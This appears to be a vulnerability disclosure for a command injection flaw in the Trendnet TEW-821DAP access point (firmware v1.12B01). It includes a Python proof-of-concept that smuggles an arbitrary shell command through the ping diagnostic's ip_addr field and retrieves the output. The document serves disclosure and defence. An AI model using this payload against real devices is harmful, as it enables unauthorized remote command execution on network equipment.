# Trendnet TEW-821DAP Command Injection Vulnerability During Firmware Update Process ## Vulnerability Overview During the firmware update process, the `tools_diagnostic()` function contains a command injection vulnerability. The user first inputs an IP address, which is validated via regular expression and then transmitted through an AJAX POST request. The IP address is stored in variable `s` and used as a parameter for the `ping` command. However, an attacker can inject malicious commands into the IP address. ## Impact Scope - **Affected Product**: TEW-821DAP - **Firmware Version**: v1.12B01 ## Remediation No specific remediation solution is provided on the page. ## POC Code ```python def vuln01_ping_cmd(self, cmd): print(f"[*] Vul #1: Ping command injection") print(f"[*] malicious: {cmd}") # actual command: moshup script -c "ping 127.0.0.1" -f /dev/null;{cmd};# -s 56 -c 1" -f /tmp/xxx payload = f"127.0.0.1 -f /dev/null;{cmd};#" params = { "method": "0", "ip_addr": payload, "pkt_size": "56", "cnt": "1", } resp = self._post_apply("tools_diagnostic", params) print(f"[*] HTTP response code: {resp.status_code}") time.sleep(3) try: result_resp = self.session.get(f"{self.base_url}/diagnostic.xml") if result_resp.status_code == 200: print(f"[*] result:") print(result_resp.text) except Exception: pass return resp ```